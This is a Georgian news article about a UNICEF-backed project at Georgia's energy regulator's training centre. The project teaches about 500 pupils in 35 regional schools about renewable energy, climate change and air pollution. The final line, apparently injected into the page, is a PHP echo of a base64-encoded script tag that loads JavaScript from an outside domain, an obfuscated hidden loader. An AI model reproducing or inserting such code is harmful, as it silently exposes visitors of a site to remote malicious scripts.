celsiusi
ავერსი საქკაბელი

გაეროს ბავშვთა ფონდის (UNICEF) მხარდაჭერით საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელ ეროვნულ კომისიასთან (სემეკ) არსებულ ელიზბარ ერისთავის სახელობის ენერგეტიკის სასწავლო ცენტრში ახალი ინიციატივა იწყება, რომლის ფარგლებშიც განახლებადი ენერგიის შესახებ საქართველოს სხვადასხვა რეგიონის სკოლების მოსწავლეები აიმაღლებენ ცნობიერებას განახლებადი ენერგიის
როლის შესახებ კლიმატის ცვლილებისა და ჰაერის დაბინძურების პრობლემების გადაჭრის საქმეში.

ინიციატივის მიზანია მოსწავლე ახალგაზრდობაში განახლებადი ენერგიის, კლიმატის ცვლილებებისა და ჰაერის დაბინძურების პრობლემების შესახებ ინფორმირებულობის დონის გაზრდა, პრობლემების მოგვარების კუთხით შესაბამისი ცოდნისა და უნარების ჩამოყალიბების ხელშეწყობა.

პროექტი განხორციელდება სამეგრელო-ზემო სვანეთის, გურიის და იმერეთის რეგიონების მუნიციპალიტეტებში, 35 სკოლის 500-მდე მოსწავლისთვის. პროექტის ფარგლებში მოსწავლე ახალგაზრდებს ჩაუტარდებათ ტრენინგები და საჯარო ლექციები.

პროექტის ხანგრძლივობაა 8 თვე. აღსანიშნავია, რომ 2022 წელს, გაეროს ბავშვთა ფონდის (UNICEF) მხარდაჭერით ენერგეტიკის სასწავლო ცენტრში განხორციელდა პროექტი სახელწოდებით: „სასმელი წყლის ხარისხისა და წყლის რესურსების შესახებ რეგიონების მოსწავლე ახალგაზრდობის ცნობიერების ამაღლება“. პროექტის შედეგად საქართველოს რეგიონების 300-ზე მეტმა ახალგაზრდამ მიიღო ცოდნა წყლის რესურსებზე ზრუნვისა და დაცვის, ენერგოეფექტიანობისა და ენერგიის დაზოგვის საკითხებზე.

161
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");